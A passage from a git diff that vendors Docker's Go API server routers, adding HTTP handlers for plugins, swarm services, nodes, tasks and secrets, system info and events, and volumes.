pr.backend.Privileges(ctx, ref, metaHeaders, authConfig) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, privileges) +} + +func (pr *pluginRouter) upgradePlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return errors.Wrap(err, "failed to parse form") + } + + var privileges types.PluginPrivileges + dec := 
json.NewDecoder(r.Body) + if err := dec.Decode(&privileges); err != nil { + return errors.Wrap(err, "failed to parse privileges") + } + if dec.More() { + return errors.New("invalid privileges") + } + + metaHeaders, authConfig := parseHeaders(r.Header) + ref, tag, err := parseRemoteRef(r.FormValue("remote")) + if err != nil { + return err + } + + name, err := getName(ref, tag, vars["name"]) + if err != nil { + return err + } + w.Header().Set("Docker-Plugin-Name", name) + + w.Header().Set("Content-Type", "application/json") + output := ioutils.NewWriteFlusher(w) + + if err := pr.backend.Upgrade(ctx, ref, name, metaHeaders, authConfig, privileges, output); err != nil { + if !output.Flushed() { + return err + } + output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err)) + } + + return nil +} + +func (pr *pluginRouter) pullPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return errors.Wrap(err, "failed to parse form") + } + + var privileges types.PluginPrivileges + dec := json.NewDecoder(r.Body) + if err := dec.Decode(&privileges); err != nil { + return errors.Wrap(err, "failed to parse privileges") + } + if dec.More() { + return errors.New("invalid privileges") + } + + metaHeaders, authConfig := parseHeaders(r.Header) + ref, tag, err := parseRemoteRef(r.FormValue("remote")) + if err != nil { + return err + } + + name, err := getName(ref, tag, r.FormValue("name")) + if err != nil { + return err + } + w.Header().Set("Docker-Plugin-Name", name) + + w.Header().Set("Content-Type", "application/json") + output := ioutils.NewWriteFlusher(w) + + if err := pr.backend.Pull(ctx, ref, name, metaHeaders, authConfig, privileges, output); err != nil { + if !output.Flushed() { + return err + } + output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err)) + } + + return nil +} + +func getName(ref reference.Named, tag, name string) (string, error) { + if name 
== "" { + if _, ok := ref.(reference.Canonical); ok { + trimmed := reference.TrimNamed(ref) + if tag != "" { + nt, err := reference.WithTag(trimmed, tag) + if err != nil { + return "", err + } + name = nt.String() + } else { + name = reference.WithDefaultTag(trimmed).String() + } + } else { + name = ref.String() + } + } else { + localRef, err := reference.ParseNamed(name) + if err != nil { + return "", err + } + if _, ok := localRef.(reference.Canonical); ok { + return "", errors.New("cannot use digest in plugin tag") + } + if distreference.IsNameOnly(localRef) { + // TODO: log change in name to out stream + name = reference.WithDefaultTag(localRef).String() + } + } + return name, nil +} + +func (pr *pluginRouter) createPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + options := &types.PluginCreateOptions{ + RepoName: r.FormValue("name")} + + if err := pr.backend.CreateFromContext(ctx, r.Body, options); err != nil { + return err + } + //TODO: send progress bar + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (pr *pluginRouter) enablePlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + name := vars["name"] + timeout, err := strconv.Atoi(r.Form.Get("timeout")) + if err != nil { + return err + } + config := &types.PluginEnableConfig{Timeout: timeout} + + return pr.backend.Enable(name, config) +} + +func (pr *pluginRouter) disablePlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + name := vars["name"] + config := &types.PluginDisableConfig{ + ForceDisable: httputils.BoolValue(r, "force"), + } + + return pr.backend.Disable(name, config) +} + +func (pr *pluginRouter) removePlugin(ctx context.Context, w 
http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + name := vars["name"] + config := &types.PluginRmConfig{ + ForceRemove: httputils.BoolValue(r, "force"), + } + return pr.backend.Remove(name, config) +} + +func (pr *pluginRouter) pushPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return errors.Wrap(err, "failed to parse form") + } + + metaHeaders, authConfig := parseHeaders(r.Header) + + w.Header().Set("Content-Type", "application/json") + output := ioutils.NewWriteFlusher(w) + + if err := pr.backend.Push(ctx, vars["name"], metaHeaders, authConfig, output); err != nil { + if !output.Flushed() { + return err + } + output.Write(streamformatter.NewJSONStreamFormatter().FormatError(err)) + } + return nil +} + +func (pr *pluginRouter) setPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var args []string + if err := json.NewDecoder(r.Body).Decode(&args); err != nil { + return err + } + if err := pr.backend.Set(vars["name"], args); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + return nil +} + +func (pr *pluginRouter) listPlugins(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + l, err := pr.backend.List() + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, l) +} + +func (pr *pluginRouter) inspectPlugin(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + result, err := pr.backend.Inspect(vars["name"]) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, result) +} diff --git a/vendor/github.com/docker/docker/api/server/router/router.go b/vendor/github.com/docker/docker/api/server/router/router.go new file mode 100644 index 0000000000..2de25c27ff --- /dev/null +++ 
b/vendor/github.com/docker/docker/api/server/router/router.go @@ -0,0 +1,19 @@ +package router + +import "github.com/docker/docker/api/server/httputils" + +// Router defines an interface to specify a group of routes to add to the docker server. +type Router interface { + // Routes returns the list of routes to add to the docker server. + Routes() []Route +} + +// Route defines an individual API route in the docker server. +type Route interface { + // Handler returns the raw function to create the http handler. + Handler() httputils.APIFunc + // Method returns the http method that the route responds to. + Method() string + // Path returns the subpath where the route responds to. + Path() string +} diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/backend.go b/vendor/github.com/docker/docker/api/server/router/swarm/backend.go new file mode 100644 index 0000000000..33840f0d30 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/swarm/backend.go @@ -0,0 +1,36 @@ +package swarm + +import ( + basictypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + types "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// Backend abstracts an swarm commands manager. 
+type Backend interface { + Init(req types.InitRequest) (string, error) + Join(req types.JoinRequest) error + Leave(force bool) error + Inspect() (types.Swarm, error) + Update(uint64, types.Spec, types.UpdateFlags) error + GetUnlockKey() (string, error) + UnlockSwarm(req types.UnlockRequest) error + GetServices(basictypes.ServiceListOptions) ([]types.Service, error) + GetService(string) (types.Service, error) + CreateService(types.ServiceSpec, string) (*basictypes.ServiceCreateResponse, error) + UpdateService(string, uint64, types.ServiceSpec, string, string) (*basictypes.ServiceUpdateResponse, error) + RemoveService(string) error + ServiceLogs(context.Context, string, *backend.ContainerLogsConfig, chan struct{}) error + GetNodes(basictypes.NodeListOptions) ([]types.Node, error) + GetNode(string) (types.Node, error) + UpdateNode(string, uint64, types.NodeSpec) error + RemoveNode(string, bool) error + GetTasks(basictypes.TaskListOptions) ([]types.Task, error) + GetTask(string) (types.Task, error) + GetSecrets(opts basictypes.SecretListOptions) ([]types.Secret, error) + CreateSecret(s types.SecretSpec) (string, error) + RemoveSecret(id string) error + GetSecret(id string) (types.Secret, error) + UpdateSecret(id string, version uint64, spec types.SecretSpec) error +} diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go b/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go new file mode 100644 index 0000000000..e2d5ad19b8 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/swarm/cluster.go @@ -0,0 +1,52 @@ +package swarm + +import "github.com/docker/docker/api/server/router" + +// swarmRouter is a router to talk with the build controller +type swarmRouter struct { + backend Backend + routes []router.Route +} + +// NewRouter initializes a new build router +func NewRouter(b Backend) router.Router { + r := &swarmRouter{ + backend: b, + } + r.initRoutes() + return r +} + +// Routes returns the available routers to 
the swarm controller +func (sr *swarmRouter) Routes() []router.Route { + return sr.routes +} + +func (sr *swarmRouter) initRoutes() { + sr.routes = []router.Route{ + router.NewPostRoute("/swarm/init", sr.initCluster), + router.NewPostRoute("/swarm/join", sr.joinCluster), + router.NewPostRoute("/swarm/leave", sr.leaveCluster), + router.NewGetRoute("/swarm", sr.inspectCluster), + router.NewGetRoute("/swarm/unlockkey", sr.getUnlockKey), + router.NewPostRoute("/swarm/update", sr.updateCluster), + router.NewPostRoute("/swarm/unlock", sr.unlockCluster), + router.NewGetRoute("/services", sr.getServices), + router.NewGetRoute("/services/{id}", sr.getService), + router.NewPostRoute("/services/create", sr.createService), + router.NewPostRoute("/services/{id}/update", sr.updateService), + router.NewDeleteRoute("/services/{id}", sr.removeService), + router.Experimental(router.Cancellable(router.NewGetRoute("/services/{id}/logs", sr.getServiceLogs))), + router.NewGetRoute("/nodes", sr.getNodes), + router.NewGetRoute("/nodes/{id}", sr.getNode), + router.NewDeleteRoute("/nodes/{id}", sr.removeNode), + router.NewPostRoute("/nodes/{id}/update", sr.updateNode), + router.NewGetRoute("/tasks", sr.getTasks), + router.NewGetRoute("/tasks/{id}", sr.getTask), + router.NewGetRoute("/secrets", sr.getSecrets), + router.NewPostRoute("/secrets/create", sr.createSecret), + router.NewDeleteRoute("/secrets/{id}", sr.removeSecret), + router.NewGetRoute("/secrets/{id}", sr.getSecret), + router.NewPostRoute("/secrets/{id}/update", sr.updateSecret), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go b/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go new file mode 100644 index 0000000000..fe976434bc --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/swarm/cluster_routes.go @@ -0,0 +1,418 @@ +package swarm + +import ( + "encoding/json" + "fmt" + "net/http" + "strconv" + + "github.com/Sirupsen/logrus" + 
"github.com/docker/docker/api/errors" + "github.com/docker/docker/api/server/httputils" + basictypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/filters" + types "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func (sr *swarmRouter) initCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var req types.InitRequest + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + return err + } + nodeID, err := sr.backend.Init(req) + if err != nil { + logrus.Errorf("Error initializing swarm: %v", err) + return err + } + return httputils.WriteJSON(w, http.StatusOK, nodeID) +} + +func (sr *swarmRouter) joinCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var req types.JoinRequest + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + return err + } + return sr.backend.Join(req) +} + +func (sr *swarmRouter) leaveCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + force := httputils.BoolValue(r, "force") + return sr.backend.Leave(force) +} + +func (sr *swarmRouter) inspectCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + swarm, err := sr.backend.Inspect() + if err != nil { + logrus.Errorf("Error getting swarm: %v", err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, swarm) +} + +func (sr *swarmRouter) updateCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var swarm types.Spec + if err := json.NewDecoder(r.Body).Decode(&swarm); err != nil { + return err + } + + rawVersion := r.URL.Query().Get("version") + version, err := strconv.ParseUint(rawVersion, 10, 64) + if err != nil { + return fmt.Errorf("Invalid swarm 
version '%s': %s", rawVersion, err.Error()) + } + + var flags types.UpdateFlags + + if value := r.URL.Query().Get("rotateWorkerToken"); value != "" { + rot, err := strconv.ParseBool(value) + if err != nil { + return fmt.Errorf("invalid value for rotateWorkerToken: %s", value) + } + + flags.RotateWorkerToken = rot + } + + if value := r.URL.Query().Get("rotateManagerToken"); value != "" { + rot, err := strconv.ParseBool(value) + if err != nil { + return fmt.Errorf("invalid value for rotateManagerToken: %s", value) + } + + flags.RotateManagerToken = rot + } + + if value := r.URL.Query().Get("rotateManagerUnlockKey"); value != "" { + rot, err := strconv.ParseBool(value) + if err != nil { + return fmt.Errorf("invalid value for rotateManagerUnlockKey: %s", value) + } + + flags.RotateManagerUnlockKey = rot + } + + if err := sr.backend.Update(version, swarm, flags); err != nil { + logrus.Errorf("Error configuring swarm: %v", err) + return err + } + return nil +} + +func (sr *swarmRouter) unlockCluster(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var req types.UnlockRequest + if err := json.NewDecoder(r.Body).Decode(&req); err != nil { + return err + } + + if err := sr.backend.UnlockSwarm(req); err != nil { + logrus.Errorf("Error unlocking swarm: %v", err) + return err + } + return nil +} + +func (sr *swarmRouter) getUnlockKey(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + unlockKey, err := sr.backend.GetUnlockKey() + if err != nil { + logrus.WithError(err).Errorf("Error retrieving swarm unlock key") + return err + } + + return httputils.WriteJSON(w, http.StatusOK, &basictypes.SwarmUnlockKeyResponse{ + UnlockKey: unlockKey, + }) +} + +func (sr *swarmRouter) getServices(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + filter, err := 
filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + services, err := sr.backend.GetServices(basictypes.ServiceListOptions{Filters: filter}) + if err != nil { + logrus.Errorf("Error getting services: %v", err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, services) +} + +func (sr *swarmRouter) getService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + service, err := sr.backend.GetService(vars["id"]) + if err != nil { + logrus.Errorf("Error getting service %s: %v", vars["id"], err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, service) +} + +func (sr *swarmRouter) createService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var service types.ServiceSpec + if err := json.NewDecoder(r.Body).Decode(&service); err != nil { + return err + } + + // Get returns "" if the header does not exist + encodedAuth := r.Header.Get("X-Registry-Auth") + + resp, err := sr.backend.CreateService(service, encodedAuth) + if err != nil { + logrus.Errorf("Error creating service %s: %v", service.Name, err) + return err + } + + return httputils.WriteJSON(w, http.StatusCreated, resp) +} + +func (sr *swarmRouter) updateService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var service types.ServiceSpec + if err := json.NewDecoder(r.Body).Decode(&service); err != nil { + return err + } + + rawVersion := r.URL.Query().Get("version") + version, err := strconv.ParseUint(rawVersion, 10, 64) + if err != nil { + return fmt.Errorf("Invalid service version '%s': %s", rawVersion, err.Error()) + } + + // Get returns "" if the header does not exist + encodedAuth := r.Header.Get("X-Registry-Auth") + + registryAuthFrom := r.URL.Query().Get("registryAuthFrom") + + resp, err := sr.backend.UpdateService(vars["id"], version, service, encodedAuth, registryAuthFrom) + if err != nil { + logrus.Errorf("Error 
updating service %s: %v", vars["id"], err) + return err + } + return httputils.WriteJSON(w, http.StatusOK, resp) +} + +func (sr *swarmRouter) removeService(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := sr.backend.RemoveService(vars["id"]); err != nil { + logrus.Errorf("Error removing service %s: %v", vars["id"], err) + return err + } + return nil +} + +func (sr *swarmRouter) getServiceLogs(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + // Args are validated before the stream starts because when it starts we're + // sending HTTP 200 by writing an empty chunk of data to tell the client that + // daemon is going to stream. By sending this initial HTTP 200 we can't report + // any error after the stream starts (i.e. container not found, wrong parameters) + // with the appropriate status code. + stdout, stderr := httputils.BoolValue(r, "stdout"), httputils.BoolValue(r, "stderr") + if !(stdout || stderr) { + return fmt.Errorf("Bad parameters: you must choose at least one stream") + } + + serviceName := vars["id"] + logsConfig := &backend.ContainerLogsConfig{ + ContainerLogsOptions: basictypes.ContainerLogsOptions{ + Follow: httputils.BoolValue(r, "follow"), + Timestamps: httputils.BoolValue(r, "timestamps"), + Since: r.Form.Get("since"), + Tail: r.Form.Get("tail"), + ShowStdout: stdout, + ShowStderr: stderr, + Details: httputils.BoolValue(r, "details"), + }, + OutStream: w, + } + + if logsConfig.Details { + return fmt.Errorf("Bad parameters: details is not currently supported") + } + + chStarted := make(chan struct{}) + if err := sr.backend.ServiceLogs(ctx, serviceName, logsConfig, chStarted); err != nil { + select { + case <-chStarted: + // The client may be expecting all of the data we're sending to + // be multiplexed, so send it through OutStream, which will + // have been set up to handle that 
if needed. + fmt.Fprintf(logsConfig.OutStream, "Error grabbing service logs: %v\n", err) + default: + return err + } + } + + return nil +} + +func (sr *swarmRouter) getNodes(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + filter, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + nodes, err := sr.backend.GetNodes(basictypes.NodeListOptions{Filters: filter}) + if err != nil { + logrus.Errorf("Error getting nodes: %v", err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, nodes) +} + +func (sr *swarmRouter) getNode(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + node, err := sr.backend.GetNode(vars["id"]) + if err != nil { + logrus.Errorf("Error getting node %s: %v", vars["id"], err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, node) +} + +func (sr *swarmRouter) updateNode(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var node types.NodeSpec + if err := json.NewDecoder(r.Body).Decode(&node); err != nil { + return err + } + + rawVersion := r.URL.Query().Get("version") + version, err := strconv.ParseUint(rawVersion, 10, 64) + if err != nil { + return fmt.Errorf("Invalid node version '%s': %s", rawVersion, err.Error()) + } + + if err := sr.backend.UpdateNode(vars["id"], version, node); err != nil { + logrus.Errorf("Error updating node %s: %v", vars["id"], err) + return err + } + return nil +} + +func (sr *swarmRouter) removeNode(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + force := httputils.BoolValue(r, "force") + + if err := sr.backend.RemoveNode(vars["id"], force); err != nil { + logrus.Errorf("Error removing node %s: %v", vars["id"], err) + return err + } + return nil +} + 
+func (sr *swarmRouter) getTasks(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + filter, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + tasks, err := sr.backend.GetTasks(basictypes.TaskListOptions{Filters: filter}) + if err != nil { + logrus.Errorf("Error getting tasks: %v", err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, tasks) +} + +func (sr *swarmRouter) getTask(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + task, err := sr.backend.GetTask(vars["id"]) + if err != nil { + logrus.Errorf("Error getting task %s: %v", vars["id"], err) + return err + } + + return httputils.WriteJSON(w, http.StatusOK, task) +} + +func (sr *swarmRouter) getSecrets(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + filters, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + secrets, err := sr.backend.GetSecrets(basictypes.SecretListOptions{Filters: filters}) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, secrets) +} + +func (sr *swarmRouter) createSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var secret types.SecretSpec + if err := json.NewDecoder(r.Body).Decode(&secret); err != nil { + return err + } + + id, err := sr.backend.CreateSecret(secret) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusCreated, &basictypes.SecretCreateResponse{ + ID: id, + }) +} + +func (sr *swarmRouter) removeSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := sr.backend.RemoveSecret(vars["id"]); err != nil { + return err + } + w.WriteHeader(http.StatusNoContent) + + 
return nil +} + +func (sr *swarmRouter) getSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + secret, err := sr.backend.GetSecret(vars["id"]) + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, secret) +} + +func (sr *swarmRouter) updateSecret(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var secret types.SecretSpec + if err := json.NewDecoder(r.Body).Decode(&secret); err != nil { + return errors.NewBadRequestError(err) + } + + rawVersion := r.URL.Query().Get("version") + version, err := strconv.ParseUint(rawVersion, 10, 64) + if err != nil { + return errors.NewBadRequestError(fmt.Errorf("invalid secret version")) + } + + id := vars["id"] + if err := sr.backend.UpdateSecret(id, version, secret); err != nil { + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/api/server/router/system/backend.go b/vendor/github.com/docker/docker/api/server/router/system/backend.go new file mode 100644 index 0000000000..6946c4e2d1 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/system/backend.go @@ -0,0 +1,21 @@ +package system + +import ( + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// Backend is the methods that need to be implemented to provide +// system specific functionality. 
+type Backend interface { + SystemInfo() (*types.Info, error) + SystemVersion() types.Version + SystemDiskUsage() (*types.DiskUsage, error) + SubscribeToEvents(since, until time.Time, ef filters.Args) ([]events.Message, chan interface{}) + UnsubscribeFromEvents(chan interface{}) + AuthenticateToRegistry(ctx context.Context, authConfig *types.AuthConfig) (string, string, error) +} diff --git a/vendor/github.com/docker/docker/api/server/router/system/system.go b/vendor/github.com/docker/docker/api/server/router/system/system.go new file mode 100644 index 0000000000..ed23d3bdee --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/system/system.go @@ -0,0 +1,39 @@ +package system + +import ( + "github.com/docker/docker/api/server/router" + "github.com/docker/docker/daemon/cluster" +) + +// systemRouter provides information about the Docker system overall. +// It gathers information about host, daemon and container events. +type systemRouter struct { + backend Backend + clusterProvider *cluster.Cluster + routes []router.Route +} + +// NewRouter initializes a new system router +func NewRouter(b Backend, c *cluster.Cluster) router.Router { + r := &systemRouter{ + backend: b, + clusterProvider: c, + } + + r.routes = []router.Route{ + router.NewOptionsRoute("/{anyroute:.*}", optionsHandler), + router.NewGetRoute("/_ping", pingHandler), + router.Cancellable(router.NewGetRoute("/events", r.getEvents)), + router.NewGetRoute("/info", r.getInfo), + router.NewGetRoute("/version", r.getVersion), + router.NewGetRoute("/system/df", r.getDiskUsage), + router.NewPostRoute("/auth", r.postAuth), + } + + return r +} + +// Routes returns all the API routes dedicated to the docker system +func (s *systemRouter) Routes() []router.Route { + return s.routes +} diff --git a/vendor/github.com/docker/docker/api/server/router/system/system_routes.go b/vendor/github.com/docker/docker/api/server/router/system/system_routes.go new file mode 100644 index 0000000000..0d851b684a --- 
/dev/null +++ b/vendor/github.com/docker/docker/api/server/router/system/system_routes.go @@ -0,0 +1,186 @@ +package system + +import ( + "encoding/json" + "fmt" + "net/http" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api" + "github.com/docker/docker/api/errors" + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/registry" + timetypes "github.com/docker/docker/api/types/time" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/pkg/ioutils" + "golang.org/x/net/context" +) + +func optionsHandler(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + w.WriteHeader(http.StatusOK) + return nil +} + +func pingHandler(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + _, err := w.Write([]byte{'O', 'K'}) + return err +} + +func (s *systemRouter) getInfo(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + info, err := s.backend.SystemInfo() + if err != nil { + return err + } + if s.clusterProvider != nil { + info.Swarm = s.clusterProvider.Info() + } + + if versions.LessThan(httputils.VersionFromContext(ctx), "1.25") { + // TODO: handle this conversion in engine-api + type oldInfo struct { + *types.Info + ExecutionDriver string + } + old := &oldInfo{ + Info: info, + ExecutionDriver: "", + } + nameOnlySecurityOptions := []string{} + kvSecOpts, err := types.DecodeSecurityOptions(old.SecurityOptions) + if err != nil { + return err + } + for _, s := range kvSecOpts { + nameOnlySecurityOptions = append(nameOnlySecurityOptions, s.Name) + } + old.SecurityOptions = nameOnlySecurityOptions + return httputils.WriteJSON(w, http.StatusOK, old) + } + return httputils.WriteJSON(w, http.StatusOK, info) +} + +func (s *systemRouter) getVersion(ctx 
context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + info := s.backend.SystemVersion() + info.APIVersion = api.DefaultVersion + + return httputils.WriteJSON(w, http.StatusOK, info) +} + +func (s *systemRouter) getDiskUsage(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + du, err := s.backend.SystemDiskUsage() + if err != nil { + return err + } + + return httputils.WriteJSON(w, http.StatusOK, du) +} + +func (s *systemRouter) getEvents(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + if err := httputils.ParseForm(r); err != nil { + return err + } + + since, err := eventTime(r.Form.Get("since")) + if err != nil { + return err + } + until, err := eventTime(r.Form.Get("until")) + if err != nil { + return err + } + + var ( + timeout <-chan time.Time + onlyPastEvents bool + ) + if !until.IsZero() { + if until.Before(since) { + return errors.NewBadRequestError(fmt.Errorf("`since` time (%s) cannot be after `until` time (%s)", r.Form.Get("since"), r.Form.Get("until"))) + } + + now := time.Now() + + onlyPastEvents = until.Before(now) + + if !onlyPastEvents { + dur := until.Sub(now) + timeout = time.NewTimer(dur).C + } + } + + ef, err := filters.FromParam(r.Form.Get("filters")) + if err != nil { + return err + } + + w.Header().Set("Content-Type", "application/json") + output := ioutils.NewWriteFlusher(w) + defer output.Close() + output.Flush() + + enc := json.NewEncoder(output) + + buffered, l := s.backend.SubscribeToEvents(since, until, ef) + defer s.backend.UnsubscribeFromEvents(l) + + for _, ev := range buffered { + if err := enc.Encode(ev); err != nil { + return err + } + } + + if onlyPastEvents { + return nil + } + + for { + select { + case ev := <-l: + jev, ok := ev.(events.Message) + if !ok { + logrus.Warnf("unexpected event message: %q", ev) + continue + } + if err := enc.Encode(jev); err != nil { + return err + } + case <-timeout: + return 
nil + case <-ctx.Done(): + logrus.Debug("Client context cancelled, stop sending events") + return nil + } + } +} + +func (s *systemRouter) postAuth(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error { + var config *types.AuthConfig + err := json.NewDecoder(r.Body).Decode(&config) + r.Body.Close() + if err != nil { + return err + } + status, token, err := s.backend.AuthenticateToRegistry(ctx, config) + if err != nil { + return err + } + return httputils.WriteJSON(w, http.StatusOK, ®istry.AuthenticateOKBody{ + Status: status, + IdentityToken: token, + }) +} + +func eventTime(formTime string) (time.Time, error) { + t, tNano, err := timetypes.ParseTimestamps(formTime, -1) + if err != nil { + return time.Time{}, err + } + if t == -1 { + return time.Time{}, nil + } + return time.Unix(t, tNano), nil +} diff --git a/vendor/github.com/docker/docker/api/server/router/volume/backend.go b/vendor/github.com/docker/docker/api/server/router/volume/backend.go new file mode 100644 index 0000000000..180c06e5d3 --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/volume/backend.go @@ -0,0 +1,17 @@ +package volume + +import ( + // TODO return types need to be refactored into pkg + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" +) + +// Backend is the methods that need to be implemented to provide +// volume specific functionality +type Backend interface { + Volumes(filter string) ([]*types.Volume, []string, error) + VolumeInspect(name string) (*types.Volume, error) + VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error) + VolumeRm(name string, force bool) error + VolumesPrune(pruneFilters filters.Args) (*types.VolumesPruneReport, error) +} diff --git a/vendor/github.com/docker/docker/api/server/router/volume/volume.go b/vendor/github.com/docker/docker/api/server/router/volume/volume.go new file mode 100644 index 0000000000..4e9f972a69 --- /dev/null +++ 
b/vendor/github.com/docker/docker/api/server/router/volume/volume.go @@ -0,0 +1,36 @@ +package volume + +import "github.com/docker/docker/api/server/router" + +// volumeRouter is a router to talk with the volumes controller +type volumeRouter struct { + backend Backend + routes []router.Route +} + +// NewRouter initializes a new volume router +func NewRouter(b Backend) router.Router { + r := &volumeRouter{ + backend: b, + } + r.initRoutes() + return r +} + +// Routes returns the available routes to the volumes controller +func (r *volumeRouter) Routes() []router.Route { + return r.routes +} + +func (r *volumeRouter) initRoutes() { + r.routes = []router.Route{ + // GET + router.NewGetRoute("/volumes", r.getVolumesList), + router.NewGetRoute("/volumes/{name:.*}", r.getVolumeByName), + // POST + router.NewPostRoute("/volumes/create", r.postVolumesCreate), + router.NewPostRoute("/volumes/prune", r.postVolumesPrune), + // DELETE + router.NewDeleteRoute("/volumes/{name:.*}", r.deleteVolumes), + } +} diff --git a/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go b/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go new file mode 100644 index 0000000000..cfd4618a4d --- /dev/null +++ b/vendor/github.com/docker/docker/api/server/router/volume/volume_routes.go @@ -0,0 +1,80 @@ +package volume + +import ( + "encoding/json" + "net/http" + + "github.com/docker/docker/api/server/httputils" + "github.com/docker/docker/api/types/filters" + volumetypes "github.com/docker/docker/api/types/volume" + "golang.org/x/net/context" +) + +func (v 